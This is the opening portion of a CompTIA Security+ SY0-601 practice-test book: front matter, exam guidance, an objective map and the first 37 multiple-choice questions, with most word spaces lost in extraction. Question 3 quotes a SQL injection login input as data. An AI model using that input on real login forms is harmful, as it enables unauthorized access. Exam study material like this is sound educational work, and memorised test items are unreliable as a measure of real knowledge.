comptia security+ practice tests - dl1.newoutlook.it

Telegram Channel @nettrain

TableofContentsCoverTitlePageCopyrightDedicationAcknowledgmentsAbouttheAuthorAbouttheTechnicalEditorIntroduction

TheSecurity+ExamUsingThisBooktoPracticeExamSY0-601ExamObjectivesSY0-601CertificationExamObjectiveMap

Chapter1:Threats,Attacks,andVulnerabilitiesChapter2:ArchitectureandDesignChapter3:ImplementationChapter4:OperationsandIncidentResponseChapter5:Governance,Risk,andComplianceAppendix:AnswersandExplanations

Chapter1: Threats,Attacks,andVulnerabilitiesChapter2:ArchitectureandDesignChapter3:ImplementationChapter4:OperationsandIncidentResponseChapter5:Governance,Risk,andCompliance

IndexEndUserLicenseAgreement


CompTIA®Security+®PracticeTest

ExamSY0-601

SecondEdition

DavidSeidl


Copyright©2021byJohnWiley&Sons,Inc.,Indianapolis,Indiana

PublishedsimultaneouslyinCanada

ISBN:978-1-119-73546-5

ISBN:978-1-119-73545-8(ebk.)

ISBN:978-1-119-73544-1(ebk.)

Nopartofthispublicationmaybereproduced,storedinaretrievalsystemortransmittedinanyformorbyanymeans,electronic,mechanical,photocopying,recording,scanningorotherwise,exceptaspermittedunderSections107or108ofthe1976UnitedStatesCopyrightAct,withouteitherthepriorwrittenpermissionofthePublisher,orauthorizationthroughpaymentoftheappropriateper-copyfeetotheCopyrightClearanceCenter,222RosewoodDrive,Danvers,MA01923,(978)750-8400,fax(978)646-8600.RequeststothePublisherforpermissionshouldbeaddressedtothePermissionsDepartment,JohnWiley&Sons,Inc.,111RiverStreet,Hoboken,NJ07030,(201)748-6011,fax(201)748-6008,oronlineatwww.wiley.com/go/permissions.

LimitofLiability/DisclaimerofWarranty:Thepublisherandtheauthormakenorepresentationsorwarrantieswithrespecttotheaccuracyorcompletenessofthecontentsofthisworkandspecificallydisclaimallwarranties,includingwithoutlimitationwarrantiesoffitnessforaparticularpurpose.Nowarrantymaybecreatedorextendedbysalesorpromotionalmaterials.Theadviceandstrategiescontainedhereinmaynotbesuitableforeverysituation.Thisworkissoldwiththeunderstandingthatthepublisherisnotengagedinrenderinglegal,accounting,orotherprofessionalservices.Ifprofessionalassistanceisrequired,theservicesofacompetentprofessionalpersonshouldbesought.Neitherthepublishernortheauthorshallbeliablefordamagesarisingherefrom.ThefactthatanorganizationorWebsiteisreferredtointhisworkasacitationand/orapotentialsourceoffurtherinformationdoesnotmeanthattheauthororthepublisherendorsestheinformationtheorganizationorWebsitemayprovideorrecommendationsitmaymake.Further,readersshouldbeawarethatInternetWebsiteslistedinthisworkmayhavechangedordisappearedbetweenwhenthisworkwaswrittenandwhenitisread.

Forgeneralinformationonourotherproductsandservicesortoobtaintechnicalsupport,pleasecontactourCustomerCareDepartmentwithintheU.S.at(877)762-2974,outsidetheU.S.at(317)572-3993orfax(317)572-4002.

Wileypublishesinavarietyofprintandelectronicformatsandbyprint-on-demand.Somematerialincludedwithstandardprintversionsofthisbookmaynotbeincludedine-booksorinprint-on-demand.IfthisbookreferstomediasuchasaCDorDVDthatisnotincludedintheversionyoupurchased,youmaydownloadthismaterialatbooksupport.wiley.com.FormoreinformationaboutWileyproducts,visitwww.wiley.com.

LibraryofCongressControlNumber:2020950198

TRADEMARKS:Wiley,theWileylogo,andtheSybexlogoaretrademarksorregisteredtrademarksofJohnWiley&Sons,Inc.and/oritsaffiliates,intheUnitedStatesandothercountries,andmaynotbeusedwithoutwrittenpermission.CompTIAandSecurity+areregisteredtrademarksofCompTIAProperties,LLC.Allothertrademarksarethepropertyoftheirrespectiveowners.JohnWiley&Sons,Inc.isnotassociatedwithanyproductorvendormentionedinthisbook.


http://www.wiley.com/go/permissions

http://booksupport.wiley.com

http://www.wiley.com

ThisbookisdedicatedtoMikeChapple,whohelpedmegetmystartinthewritingfield.Aftermostofadecadewritingtogether,thisismyfirstentirelysoloproject.Mike,thankyouforhelpingmegetmystartalmostadecadeago,forencouragingmealongtheway,andforcontinuingtochallengemetodomoreeachtimewetakeonanotherbook.

—David


AcknowledgmentsBookslikethisinvolveworkfrommanypeoplewhoputcountlesshoursoftimeandeffortintoproducingthemfromconcepttofinalprintedandelectroniccopies.ThehardworkanddedicationoftheteamatWileyalwaysshows.IespeciallywanttoacknowledgeandthanksenioracquisitionseditorKenyonBrown,whocontinuestobeawonderfulpersontoworkwithonbookafterbook.

Ialsogreatlyappreciatedtheeditingandproductionteamforthebook,includingTomDinse,theprojecteditor,whobroughtyearsofexperienceandgreattalenttotheproject;ChrisCrayton,thetechnicaleditor,whoprovidedinsightfuladviceandgavewonderfulfeedbackthroughoutthebook;andSaravananDakshinamurthy,theproductioneditor,whoguidedmethroughlayouts,formatting,andfinalcleanuptoproduceagreatbook.Iwouldalsoliketothankthemanybehind-the-scenescontributors,includingthegraphics,production,andtechnicalteamswhomakethebookandcompanionmaterialsintoafinishedproduct.

Myagent,CaroleJelenofWatersideProductions,continuestoprovideuswithwonderfulopportunities,advice,andassistancethroughoutourwritingcareers.

Finally,Iwanttothankmyfriendsandfamily,whohavesupportedmethroughthelateevenings,busyweekends,andlonghoursthatabooklikethisrequirestowrite,edit,andgettopress.


AbouttheAuthorDavidSeidlisvicepresidentforinformationtechnologyandCIOatMiamiUniversity,whereheisresponsibleforITforMiamiUniversity.DuringhisITcareer,hehasservedinavarietyoftechnicalandinformationsecurityroles,includingservingastheseniordirectorforCampusTechnologyServicesattheUniversityofNotreDame,whereheco-ledNotreDame'smovetothecloudandoversawcloudoperations,ERP,databases,identitymanagement,andabroadrangeofothertechnologiesandservice.PriortohisseniorleadershiprolesatNotreDame,heservedasNotreDame'sdirectorofinformationsecurityandledNotreDame'sinformationsecurityprogram.HetaughtinformationsecurityandnetworkingundergraduatecoursesasaninstructorforNotreDame'sMendozaCollegeofBusinessandhaswrittenbooksonsecuritycertificationandcyberwarfare,includingcoauthoringCISSP(ISC)2OfficialPracticeTests(Sybex,2018)aswellasthecurrentandpreviouseditionsoftheCompTIACySA+StudyGuide:ExamCS0-002(Wiley,2020,Chapple/Seidl)andCompTIACySA+PracticeTests:ExamCS0-002(Wiley,2020,Chapple/Seidl).

Davidholdsabachelor'sdegreeincommunicationtechnologyandamaster'sdegreeininformationsecurityfromEasternMichiganUniversity,aswellasCISSP,CySA+,Pentest+,GPEN,andGCIHcertifications.


AbouttheTechnicalEditorChrisCrayton,MSCE,CISSP,CySA+,A+,N+,S+,isatechnicalconsultant,trainer,author,andindustry-leadingtechnicaleditor.Hehasworkedasacomputertechnologyandnetworkinginstructor,informationsecuritydirector,networkadministrator,networkengineer,andPCspecialist.Chrishasservedastechnicaleditorandcontentcontributoronnumeroustechnicaltitlesforseveraloftheleadingpublishingcompanies.Hehasalsobeenrecognizedwithmanyprofessionalandteachingawards.


IntroductionCompTIASecurity+PracticeTests:ExamSY0-601,SecondEditionistheperfectcompanionvolumetotheCompTIASecurity+StudyGuide:ExamSY0-601,EighthEdition(Wiley,2020,Chapple/Seidl).Ifyou'relookingtotestyourknowledgebeforeyoutaketheSecurity+exam,thisbookwillhelpyoubyprovidingacombinationof1,100questionsthatcovertheSecurity+domainsandeasy-to-understandexplanationsofbothrightandwronganswers.

Ifyou'rejuststartingtopreparefortheSecurity+exam,wehighlyrecommendthatyouusetheCompTIASecurity+StudyGuide,EighthEditiontohelpyoulearnabouteachofthedomainscoveredbytheSecurity+exam.Onceyou'rereadytotestyourknowledge,usethisbooktohelpfindplaceswhereyoumayneedtostudymoreortopracticefortheexamitself.

SincethisisacompaniontotheSecurity+StudyGuide,thisbookisdesignedtobesimilartotakingtheSecurity+exam.Thebookitselfisbrokenupintosevenchapters:fivedomain-centricchapterswithquestionsabouteachdomain,andtwochaptersthatcontain100-questionpracticeteststosimulatetakingtheSecurity+examitself.

Ifyoucananswer90percentormoreofthequestionsforadomaincorrectly,youcanfeelsafemovingontothenextchapter.Ifyou'reunabletoanswerthatmanycorrectly,rereadthechapterandtrythequestionsagain.Yourscoreshouldimprove.

Don'tjuststudythequestionsandanswers!Thequestionsontheactualexamwillbedifferentfromthepracticequestionsincludedinthisbook.Theexamisdesignedtotestyourknowledgeofaconceptorobjective,sousethisbooktolearntheobjectivesbehindthequestions.

TheSecurity+ExamTheSecurity+examisdesignedtobeavendor-neutralcertificationfor


cybersecurityprofessionalsandthoseseekingtoenterthefield.CompTIArecommendsthiscertificationforthosecurrentlyworking,oraspiringtowork,inroles,including:

Systemsadministrator

Securityadministrator

Securityspecialist

Securityengineer

Networkadministrator

JuniorITauditor/penetrationtester

Securityconsultant

Theexamcoversfivemajordomains:

1. Threats,Attacks,andVulnerabilities

2. ArchitectureandDesign

3. Implementation

4. OperationsandIncidentResponse

5. Governance,Risk,andCompliance

Thesefiveareasincludearangeoftopics,fromfirewalldesigntoincidentresponseandforensics,whilefocusingheavilyonscenario-basedlearning.That'swhyCompTIArecommendsthatthoseattemptingtheexamhaveatleasttwoyearsofhands-onworkexperience,althoughmanyindividualspasstheexambeforemovingintotheirfirstcybersecurityrole.

TheSecurity+examisconductedinaformatthatCompTIAcalls“performance-basedassessment.”Thismeansthattheexamcombinesstandardmultiple-choicequestionswithother,interactivequestionformats.Yourexammayincludemultipletypesofquestions,suchasmultiple-choice,fill-in-the-blank,multiple-response,drag-and-drop,andimage-basedproblems.

CompTIArecommendsthattesttakershavetwoyearsofinformationsecurity–relatedexperiencebeforetakingthisexam.Theexamcosts$349intheUnitedStates,withroughlyequivalentpricesinotherlocationsaroundtheglobe.MoredetailsabouttheSecurity+examandhowtotakeitcanbefoundhere:www.comptia.org/certifications/security


http://www.comptia.org/certifications/security

ThisbookincludesadiscountcodefortheSecurity+exam—makesureyouuseit!

You'llhave90minutestotaketheexamandwillbeaskedtoanswerupto90questionsduringthattimeperiod.Yourexamwillbescoredonascalerangingfrom100to900,withapassingscoreof750.

YoushouldalsoknowthatCompTIAisnotoriousforincludingvaguequestionsonallofitsexams.Youmightseeaquestionforwhichtwoofthepossiblefouranswersarecorrect—butyoucanchooseonlyone.Useyourknowledge,logic,andintuitiontochoosethebestanswerandthenmoveon.Sometimes,thequestionsarewordedinwaysthatwouldmakeEnglishmajorscringe—atypohere,anincorrectverbthere.Don'tletthisfrustrateyou;answerthequestionandmoveontothenextone.

CompTIAfrequentlydoeswhatiscalleditemseeding,whichisthepracticeofincludingunscoredquestionsonexams.Itdoessotogatherpsychometricdata,whichisthenusedwhendevelopingnewversionsoftheexam.Beforeyoutaketheexam,youwillbetoldthatyourexammayincludetheseunscoredquestions.So,ifyoucomeacrossaquestionthatdoesnotappeartomaptoanyoftheexamobjectives—orforthatmatter,doesnotappeartobelongintheexam—itislikelyaseededquestion.Youneverknowwhetherornotaquestionisseeded,however,soalwaysmakeyourbestefforttoanswereveryquestion.

TakingtheExamOnceyouarefullypreparedtotaketheexam,youcanvisittheCompTIAwebsitetopurchaseyourexamvoucher:www.comptiastore.com/Articles.asp?ID=265&category=vouchers

CompTIApartnerswithPearsonVUE'stestingcenters,soyournextstepwillbetolocateatestingcenternearyou.IntheUnitedStates,youcandothisbasedon


http://www.comptiastore.com/Articles.asp?ID=265&category=vouchers

youraddressoryourZIPcode,whereasnon-U.S.testtakersmayfinditeasiertoentertheircityandcountry.YoucansearchforatestcenternearyouatthePearsonVuewebsite,whereyouwillneedtonavigateto“Findatestcenter.”www.pearsonvue.com/comptia

Nowthatyouknowwhereyou'dliketotaketheexam,simplysetupaPearsonVUEtestingaccountandscheduleanexam:home.pearsonvue.com/comptia/onvue

Onthedayofthetest,taketwoformsofidentification,andmakesuretoshowupwithplentyoftimebeforetheexamstarts.Rememberthatyouwillnotbeabletotakeyournotes,electronicdevices(includingsmartphonesandwatches),orothermaterialsinwithyou,andthatotherrequirementsmayexistforthetest.Makesureyoureviewthoserequirementsbeforethedayofyourtestsoyou'refullypreparedforboththetestitselfaswellasthetestingprocessandfacilityrules.

AftertheSecurity+ExamOnceyouhavetakentheexam,youwillbenotifiedofyourscoreimmediately,soyou'llknowifyoupassedthetestrightaway.Youshouldkeeptrackofyourscorereportwithyourexamregistrationrecordsandtheemailaddressyouusedtoregisterfortheexam.

MaintainingYourCertificationCompTIAcertificationsmustberenewedonaperiodicbasis.Torenewyourcertification,youcanpassthemostcurrentversionoftheexam,earnaqualifyinghigher-levelCompTIAorindustrycertification,orcompletesufficientcontinuingeducationactivitiestoearnenoughcontinuingeducationunits(CEUs)torenewit.

CompTIAprovidesinformationonrenewalsviatheirwebsiteat:www.comptia.org/continuing-education

Whenyousignuptorenewyourcertification,youwillbeaskedtoagreetotheCEprogram'sCodeofEthics,topayarenewalfee,andtosubmitthematerialsrequiredforyourchosenrenewalmethod.

AfulllistoftheindustrycertificationsyoucanusetoacquireCEUstowardrenewingtheSecurity+canbefoundat:www.comptia.org/continuing-education/choose/renew-with-a-single-


http://www.pearsonvue.com/comptia

http://home.pearsonvue.com/comptia/onvue

http://www.comptia.org/continuing-education

http://www.comptia.org/continuing-education/choose/renew-with-a-single-activity/earn-a-higher-level-comptia-certification

activity/earn-a-higher-level-comptia-certification


UsingThisBooktoPracticeThisbookiscomposedofsevenchapterswithover1,000practicetestquestions.Eachofthefirstfivechapterscoversadomain,withavarietyofquestionsthatcanhelpyoutestyourknowledgeofreal-world,scenario,andbestpractices–basedsecurityknowledge.Thefinaltwochaptersarecompletepracticeexamsthatcanserveastimedpracticeteststohelpdeterminewhetheryou'rereadyfortheSecurity+exam.

Werecommendtakingthefirstpracticeexamtohelpidentifywhereyoumayneedtospendmorestudytimeandthenusingthedomain-specificchapterstotestyourdomainknowledgewhereitisweak.Onceyou'reready,takethesecondpracticeexamtomakesureyou'vecoveredallthematerialandarereadytoattempttheSecurity+exam.

Asyouworkthroughquestionsinthisbook,youwillencountertoolsandtechnologythatyoumaynotbefamiliarwith.Ifyoufindthatyouarefacingaconsistentgaporthatadomainisparticularlychallenging,werecommendspendingsometimewithbooksandmaterialsthattacklethatdomainindepth.Thisapproachcanhelpyoufillingapsandhelpyoubemorepreparedfortheexam.

Toaccessourinteractivetestbankandonlinelearningenvironment,simplyvisitwww.wiley.com/go/sybextestprep,registertoreceiveyouruniquePIN,andinstantlygainoneyearofFREEaccessafteractivationtotheinteractivetestbankwith2practiceexamsandhundredsofdomain-by-domainquestions.Over1,000questionstotal!

ExamSY0-601ExamObjectivesCompTIAgoestogreatlengthstoensurethatitscertificationprogramsaccuratelyreflecttheITindustry'sbestpractices.Theydothisbyestablishingcommitteesforeachofitsexamprograms.EachcommitteeconsistsofasmallgroupofITprofessionals,trainingproviders,andpublisherswhoareresponsible


http://www.wiley.com/go/sybextestprep

forestablishingtheexam'sbaselinecompetencylevelandwhodeterminetheappropriatetarget-audiencelevel.

Oncethesefactorsaredetermined,CompTIAsharesthisinformationwithagroupofhand-selectedsubjectmatterexperts(SMEs).Thesefolksarethetruebrainpowerbehindthecertificationprogram.TheSMEsreviewthecommittee'sfindings,refinethem,andshapethemintotheobjectivesthatfollowthissection.CompTIAcallsthisprocessajob-taskanalysis(JTA).

Finally,CompTIAconductsasurveytoensurethattheobjectivesandweightingstrulyreflectjobrequirements.OnlythencantheSMEsgotoworkwritingthehundredsofquestionsneededfortheexam.Evenso,theyhavetogobacktothedrawingboardforfurtherrefinementsinmanycasesbeforetheexamisreadytogoliveinitsfinalstate.Restassuredthatthecontentyou'reabouttolearnwillserveyoulongafteryoutaketheexam.

CompTIAalsopublishesrelativeweightingsforeachoftheexam'sobjectives.ThefollowingtableliststhefiveSecurity+objectivedomainsandtheextenttowhichtheyarerepresentedontheexam.

Domain %ofExam1.0Threats,Attacks,andVulnerabilities 24%2.0ArchitectureandDesign 21%3.0Implementation 25%4.0OperationsandIncidentResponse 16%5.0Governance,Risk,andCompliance 14%

SY0-601CertificationExamObjectiveMapObjective Chapter1.0Threats,AttacksandVulnerabilities1.1Compareandcontrastdifferenttypesofsocialengineeringtechniques

Chapter1

1.2Givenascenario,analyzepotentialindicatorstodeterminethetypeofattack

Chapter1

1.3Givenascenario,analyzepotentialindicatorsassociatedwithapplicationattacks

Chapter1

1.4Givenascenario,analyzepotentialindicatorsassociatedwith Chapter


networkattacks 11.5Explaindifferentthreatactors,vectors,andintelligencesources Chapter

11.6Explainthesecurityconcernsassociatedwithvarioustypesofvulnerabilities

Chapter1

1.7Summarizethetechniquesusedinsecurityassessments Chapter1

1.8Explainthetechniquesusedinpenetrationtesting Chapter1

2.0ArchitectureandDesign2.1Explaintheimportanceofsecurityconceptsinanenterpriseenvironment

Chapter2

2.2Summarizevirtualizationandcloudcomputingconcepts Chapter2

2.3Summarizesecureapplicationdevelopment,deployment,andautomationconcepts

Chapter2

2.4Summarizeauthenticationandauthorizationdesignconcepts Chapter2

2.5Givenascenario,implementcybersecurityresilience Chapter2

2.6Explainthesecurityimplicationsofembeddedandspecializedsystems

Chapter2

2.7Explaintheimportanceofphysicalsecuritycontrols Chapter2

2.8Summarizethebasicsofcryptographicconcepts Chapter2

3.0Implementation3.1Givenascenario,implementsecureprotocols Chapter

33.2Givenascenario,implementhostorapplicationsecuritysolutions Chapter

33.3Givenascenario,implementsecurenetworkdesigns Chapter

33.4Givenascenario,installandconfigurewirelesssecuritysettings Chapter


3

3.5Givenascenario,implementsecuremobilesolutions Chapter3

3.6Givenascenario,applycybersecuritysolutionstothecloud Chapter3

3.7Givenascenario,implementidentityandaccountmanagementcontrols

Chapter3

3.8Givenascenario,implementauthenticationandauthorizationsolutions

Chapter3

3.9Givenascenario,implementpublickeyinfrastructure Chapter3

4.0OperationsandIncidentResponse4.1Givenascenariousetheappropriatetooltoassessorganizationalsecurity

Chapter4

4.2Summarizetheimportanceofpolicies,processes,andproceduresforincidentresponse

Chapter4

4.3Givenanincident,utilizeappropriatedatasourcestosupportaninvestigation

Chapter4

4.4Givenanincident,applymitigationtechniquesorcontrolstosecureanenvironment

Chapter4

4.5Explainthekeyaspectsofdigitalforensics Chapter4

5.0Governance,Risk,andCompliance5.1Compareandcontrastvarioustypesofcontrols Chapter

55.2Explaintheimportanceofapplicableregulations,standards,orframeworksthatimpactorganizationalsecurityposture

Chapter5

5.3Explaintheimportanceofpoliciestoorganizationalsecurity Chapter5

5.4Summarizeriskmanagementprocessesandconcepts Chapter5

5.5Explainprivacyandsensitivedataconceptsinrelationtosecurity Chapter5


ExamobjectivesaresubjecttochangeatanytimewithoutpriornoticeandatCompTIA'sdiscretion.PleasevisitCompTIA'swebsite(www.comptia.org)forthemostcurrentlistingofexamobjectives.


http://www.comptia.org

Chapter1Threats,Attacks,andVulnerabilities

THECOMPTIASECURITY+EXAMSY0-601TOPICSCOVEREDINTHISCHAPTERINCLUDETHEFOLLOWING:

1.1 Compareandcontrastdifferenttypesofsocialengineeringtechniques

1.2 Givenascenario,analyzepotentialindicatorstodeterminethetypeofattack

1.3 Givenascenario,analyzepotentialindicatorsassociatedwithapplicationattacks

1.4 Givenascenario,analyzepotentialindicatorsassociatedwithnetworkattacks

1.5 Explaindifferentthreatactors,vectors,andintelligencesources

1.6 Explainthesecurityconcernsassociatedwithvarioustypesofvulnerabilities

1.7 Summarizethetechniquesusedinsecurityassessments

1.8 Explainthetechniquesusedinpenetrationtesting

1. Ahmedisasalesmanagerwithamajorinsurancecompany.Hehasreceivedanemailthatisencouraginghimtoclickonalinkandfilloutasurvey.Heissuspiciousoftheemail,butitdoesmentionamajorinsuranceassociation,andthatmakeshimthinkitmightbelegitimate.Whichofthefollowingbestdescribesthisattack?

A. Phishing

B. Socialengineering

C. Spearphishing

D. Trojanhorse


2. Youareasecurityadministratorforamedium-sizedbank.Youhavediscoveredapieceofsoftwareonyourbank'sdatabaseserverthatisnotsupposedtobethere.Itappearsthatthesoftwarewillbegindeletingdatabasefilesifaspecificemployeeisterminated.Whatbestdescribesthis?

A. Worm

B. Logicbomb

C. Trojanhorse

D. Rootkit

3. YouareresponsibleforincidentresponseatAcmeBank.TheAcmeBankwebsitehasbeenattacked.Theattackerusedtheloginscreen,butratherthanenterlogincredentials,theyenteredsomeoddtext:'or'1'='1.Whatisthebestdescriptionforthisattack?

A. Cross-sitescripting

B. Cross-siterequestforgery

C. SQLinjection

D. ARPpoisoning

4. Usersarecomplainingthattheycannotconnecttothewirelessnetwork.YoudiscoverthattheWAPsarebeingsubjectedtoawirelessattackdesignedtoblocktheirWi-Fisignals.Whichofthefollowingisthebestlabelforthisattack?

A. IVattack

B. Jamming

C. WPSattack

D. Botnet

5. Frankisdeeplyconcernedaboutattackstohiscompany'se-commerceserver.Heisparticularlyworriedaboutcross-sitescriptingandSQLinjection.Whichofthefollowingwouldbestdefendagainstthesetwospecificattacks?

A. Encryptedwebtraffic

B. Inputvalidation


C. Afirewall

D. AnIDS

6. YouareresponsiblefornetworksecurityatAcmeCompany.Usershavebeenreportingthatpersonaldataisbeingstolenwhenusingthewirelessnetwork.Theyallinsisttheyonlyconnecttothecorporatewirelessaccesspoint(AP).However,logsfortheAPshowthattheseusershavenotconnectedtoit.Whichofthefollowingcouldbestexplainthissituation?

A. Sessionhijacking

B. Clickjacking

C. Rogueaccesspoint

D. Bluejacking

7. WhattypeofattackdependsontheattackerenteringJavaScriptintoatextareathatisintendedforuserstoentertextthatwillbeviewedbyotherusers?

A. SQLinjection

B. Clickjacking

C. Cross-sitescripting

D. Bluejacking

8. Rickwantstomakeofflinebrute-forceattacksagainsthispasswordfileverydifficultforattackers.Whichofthefollowingisnotacommontechniquetomakepasswordshardertocrack?

A. Useofasalt

B. Useofapepper

C. Useofapurpose-builtpasswordhashingalgorithm

D. Encryptingpasswordplaintextusingsymmetricencryption

9. WhattermisusedtodescribespamoverInternetmessagingservices?

A. SPIM

B. SMSPAM

C. IMSPAM

D. TwoFaceTiming


10. Susanisanalyzingthesourcecodeforanapplicationanddiscoversapointerde-referenceandreturnsNULL.ThiscausestheprogramtoattempttoreadfromtheNULLpointerandresultsinasegmentationfault.Whatimpactcouldthishavefortheapplication?

A. Adatabreach

B. Adenial-of-servicecondition

C. Permissionscreep

D. Privilegeescalation

11. Teresaisthesecuritymanagerforamid-sizedinsurancecompany.Shereceivesacallfromlawenforcement,tellingherthatsomecomputersonhernetworkparticipatedinamassivedenial-of-service(DoS)attack.Teresaiscertainthatnoneoftheemployeesathercompanywouldbeinvolvedinacybercrime.Whatwouldbestexplainthisscenario?

A. Itisaresultofsocialengineering.

B. Themachinesallhavebackdoors.

C. Themachinesarebots.

D. Themachinesareinfectedwithcrypto-viruses.

12. Unusualoutboundnetworktraffic,geographicalirregularities,andincreasesindatabasereadvolumesareallexamplesofwhatkeyelementofthreatintelligence?

A. Predictiveanalysis

B. OSINT

C. Indicatorsofcompromise

D. Threatmaps

13. ChrisneedsvisibilityintoconnectionattemptsthroughafirewallbecausehebelievesthataTCPhandshakeisnotproperlyoccurring.Whatsecurityinformationandeventmanagement(SIEM)capabilityisbestsuitedtotroubleshootingthisissue?

A. Reviewingreports

B. Packetcapture


C. Sentimentanalysis

D. Logcollectionandanalysis

14. Chriswantstodetectapotentialinsiderthreatusinghissecurityinformationandeventmanagement(SIEM)system.Whatcapabilitybestmatcheshisneeds?

A. Sentimentanalysis

B. Logaggregation

C. Securitymonitoring

D. Userbehavioranalysis

15. Chrishashundredsofsystemsspreadacrossmultiplelocationsandwantstobetterhandletheamountofdatathattheycreate.Whattwotechnologiescanhelpwiththis?

A. Logaggregationandlogcollectors

B. Packetcaptureandlogaggregation

C. Securitymonitoringandlogcollectors

D. Sentimentanalysisanduserbehavioranalysis

16. Whattypeofsecurityteamestablishestherulesofengagementforacybersecurityexercise?

A. Blueteam

B. Whiteteam

C. Purpleteam

D. Redteam

17. Cynthiaisconcernedaboutattacksagainstanapplicationprogramminginterface(API)thathercompanyprovidesforitscustomers.WhatshouldsherecommendtoensurethattheAPIisonlyusedbycustomerswhohavepaidfortheservice?

A. Requireauthentication.

B. Installandconfigureafirewall.

C. FilterbyIPaddress.

D. InstallanduseanIPS.


18. Whattypeofattackisbasedonsendingmoredatatoatargetvariablethanthedatacanactuallyhold?

A. Bluesnarfing

B. Bufferoverflow

C. Bluejacking

D. Cross-sitescripting

19. AnemailarrivestellingGurvinderthatthereisalimitedtimetoacttogetasoftwarepackageforfreeandthatthefirst50downloadswillnothavetobepaidfor.Whatsocialengineeringprincipleisbeingusedagainsthim?

A. Scarcity

B. Intimidation

C. Authority

D. Consensus

20. Youhavebeenaskedtotestyourcompanynetworkforsecurityissues.Thespecifictestyouareconductinginvolvesprimarilyusingautomatedandsemiautomatedtoolstolookforknownvulnerabilitieswiththevarioussystemsonyournetwork.Whichofthefollowingbestdescribesthistypeoftest?

A. Vulnerabilityscan

B. Penetrationtest

C. Securityaudit

D. Securitytest

21. Susanwantstoreducethelikelihoodofsuccessfulcredentialharvestingattacksviaherorganization'scommercialwebsites.Whichofthefollowingisnotacommonpreventionmethodaimedatstoppingcredentialharvesting?

A. Useofmultifactorauthentication

B. Userawarenesstraining

C. Useofcomplexusernames

D. Limitingorpreventinguseofthird-partywebscriptsandplugins


22. Gregwantstogainadmissiontoanetworkwhichisprotectedbyanetworkaccesscontrol(NAC)systemthatrecognizedthehardwareaddressofsystems.Howcanhebypassthisprotection?

A. SpoofalegitimateIPaddress.

B. Conductadenial-of-serviceattackagainsttheNACsystem.

C. UseMACcloningtoclonealegitimateMACaddress.

D. Noneoftheabove

23. Coleenisthewebsecurityadministratorforanonlineauctionwebsite.Asmallnumberofusersarecomplainingthatwhentheyvisitthewebsiteitdoesnotappeartobethecorrectsite.Coleenchecksandshecanvisitthesitewithoutanyproblem,evenfromcomputersoutsidethenetwork.Shealsochecksthewebserverlogandthereisnorecordofthoseuserseverconnecting.Whichofthefollowingmightbestexplainthis?

A. Typosquatting

B. SQLinjection

C. Cross-sitescripting

D. Cross-siterequestforgery

24. TheorganizationthatMikeworksinfindsthatoneoftheirdomainsisdirectingtraffictoacompetitor'swebsite.WhenMikechecks,thedomaininformationhasbeenchanged,includingthecontactandotheradministrativedetailsforthedomain.Ifthedomainhadnotexpired,whathasmostlikelyoccurred?

A. DNShijacking

B. Anon-pathattack

C. Domainhijacking

D. Azero-dayattack

25. Mahmoudisresponsibleformanagingsecurityatalargeuniversity.Hehasjustperformedathreatanalysisforthenetwork,andbasedonpastincidentsandstudiesofsimilarnetworks,hehasdeterminedthatthemostprevalentthreattohisnetworkislow-skilledattackerswhowishtobreachthesystem,simplytoprovetheycanorforsomelow-levelcrime,suchaschangingagrade.Whichtermbestdescribesthistypeofattacker?


A. Hacktivist

B. Amateur

C. Insider

D. Scriptkiddie

26. Howisphishingdifferentfromgeneralspam?

A. Itissentonlytospecifictargetedindividuals.

B. Itisintendedtoacquirecredentialsorotherdata.

C. ItissentviaSMS.

D. Itincludesmalwareinthemessage.

27. Whichofthefollowingbestdescribesacollectionofcomputersthathavebeencompromisedandarebeingcontrolledfromonecentralpoint?

A. Zombienet

B. Botnet

C. Nullnet

D. Attacknet

28. Selahincludesaquestioninherprocurementrequest-for-proposalprocessthataskshowlongthevendorhasbeeninbusinessandhowmanyexistingclientsthevendorhas.Whatcommonissueisthispracticeintendedtohelpprevent?

A. Supplychainsecurityissues

B. Lackofvendorsupport

C. Outsourcedcodedevelopmentissues

D. Systemintegrationproblems

29. Johnisconductingapenetrationtestofaclient'snetwork.Heiscurrentlygatheringinformationfromsourcessuchasarchive.org,netcraft.com,socialmedia,andinformationwebsites.Whatbestdescribesthisstage?

A. Activereconnaissance

B. Passivereconnaissance

C. Initialexploitation


http://archive.org

http://netcraft.com

D. Pivot

30. AlicewantstopreventSSRFattacks.Whichofthefollowingwillnotbehelpfulforpreventingthem?

A. RemovingallSQLcodefromsubmittedHTTPqueries

B. Blockinghostnameslike127.0.01andlocalhost

C. BlockingsensitiveURLslike/admin

D. Applyingwhitelist-basedinputfilters

31. Whattypeofattackisbasedonenteringfakeentriesintoatargetnetwork'sdomainnameserver?

A. DNSpoisoning

B. ARPpoisoning

C. XSSpoisoning

D. CSRFpoisoning

32. Frankhasbeenaskedtoconductapenetrationtestofasmallbookkeepingfirm.Forthetest,hehasonlybeengiventhecompanyname,thedomainnamefortheirwebsite,andtheIPaddressoftheirgatewayrouter.Whatbestdescribesthistypeoftest?

A. Aknownenvironmenttest

B. Externaltest

C. Anunknownenvironmenttest

D. Threattest

33. Youworkforasecuritycompanythatperformspenetrationtestingforclients.Youareconductingatestofane-commercecompany.Youdiscoverthataftercompromisingthewebserver,youcanusethewebservertolaunchasecondattackintothecompany'sinternalnetwork.Whatbestdescribesthis?

A. Internalattack

B. Knownenvironmenttesting

C. Unknownenvironmenttesting

D. Apivot


34. Whileinvestigatingamalwareoutbreakonyourcompanynetwork,youdiscoversomethingveryodd.ThereisafilethathasthesamenameasaWindowssystemDLL,anditevenhasthesameAPIinterface,butithandlesinputverydifferently,inamannertohelpcompromisethesystem,anditappearsthatapplicationshavebeenattachingtothisfile,ratherthantherealsystemDLL.Whatbestdescribesthis?

A. Shimming

B. Trojanhorse

C. Backdoor

D. Refactoring

35. WhichofthefollowingcapabilitiesisnotakeypartofaSOAR(securityorchestration,automation,andresponse)tool?

A. Threatandvulnerabilitymanagement

B. Securityincidentresponse

C. Automatedmalwareanalysis

D. Securityoperationsautomation

36. Johndiscoversthatemailfromhiscompany'semailserversisbeingblockedbecauseofspamthatwassentfromacompromisedaccount.WhattypeoflookupcanheusetodeterminewhatvendorslikeMcAfeeandBarracudahaveclassifiedhisdomainas?

A. Annslookup

B. Atcpdump

C. Adomainreputationlookup

D. ASMTPwhois

37. Frankisanetworkadministratorforasmallcollege.Hediscoversthatseveralmachinesonhisnetworkareinfectedwithmalware.Thatmalwareissendingafloodofpacketstoatargetexternaltothenetwork.Whatbestdescribesthisattack?

A. SYNflood

B. DDoS

C. Botnet


D. Backdoor

